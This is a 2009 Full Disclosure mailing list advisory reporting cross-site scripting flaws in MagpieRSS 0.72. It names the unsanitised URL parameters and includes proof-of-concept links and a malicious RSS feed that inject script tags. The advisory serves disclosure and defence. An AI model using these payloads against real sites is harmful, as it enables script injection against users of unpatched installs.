Full Disclosure mailing list archives
MagpieRSS Multiple XSS Vulnerabilities
From: "Justin C. Klein Keane" <justin () madirish net>
Date: Fri, 08 May 2009 12:43:53 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -= MagpieRSS Multiple XSS Vulnerabilities =- May 6, 2009 Author: Justin C. Klein Keane <justin () madirish net> Software: MagpieRSS (http://magpierss.sourceforge.net/) Version Tested: magpierss-0.72 Vendor notified Full details can also be found at http://lampsecurity.org/magpierss-vulnerability MagpieRSS (http://magpierss.sourceforge.net/) is a PHP based RSS reader. "MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS 1.0's modules, RSS 2.0, and Atom. (with a few exceptions)." Magpie suffers from multiple cross site scripting (XSS) vulnerabilities. The first class of vulnerability is due to the failure to sanitize URL variables in scripts included with the MagpieRSS distribution. Specifically the $url variable is crafted from $_GET['url'] and used in display to users in: magpierss-0.72/scripts/magpie_simple.php magpierss-0.72/scripts/magpie_debug.php The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url variable, but cast from $_GET['rss_url']. The second class of XSS results from MagpieRSS' failure to sanitize any of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc. This could result in cross site scripting vulnerabilities being injected by malicious RSS feeds. - -=Proof of concept=- The following links can be used to trigger XSS in Magpie's sample scripts: http://192.168.0.2site/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script http://192.168.0.2/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script The following malicious RSS feed can be used to exploit Magpie's RSS rendering: <?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xml:base="http://justin.madirish.net"; xmlns:dc="http://purl.org/dc/elements/1.1/";> <channel> <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage</title> <link>http://justin.madirish.net</link> <description>Close personal friends with Evil Eve.</description> <language>en</language> <item> <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title> <link>http://justin.madirish.net/node/343 <script>alert('xss link');</script></link> <description>foobar</description> <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate> <dc:creator>justin</dc:creator> <guid isPermaLink="false">343 at http://justin.madirish.net</guid> </item> </channel> </rss> - -- Justin C. Klein Keane http://www.MadIrish.net http://www.LAMPSecurity.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQD1AwUBSgRhSZEpbGy7DdYAAQKdYQcAqeMh+Xb0tNPOtaNo7cZx/ephiLSwsjYs ij8noyk1W3ONThKYiGqju9z6493DKhAWSDbXEqkFmZCVquSwYaPNIsCUbza1wC0i iy01RJPCcjB2jzfj4lCXNaDrzK3SZnsBlRS3jK5AYo3C9/msLA/wiSmpkltVvXxI G7AIVFOxNVHmhyKtj+jJC0Wv+IoNj1RstKZ3kkEe1RnZsZ5ntv+gxsEkVr/Z7eiM EmxzZwDvKMHCnuhgMG0ZcZGMcB+DEjLw5keKAvlXojEottZIESoynp4rsF0SVE4G M5uacRMg93U= =sY6i -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MagpieRSS Multiple XSS Vulnerabilities Justin C. Klein Keane (May 08)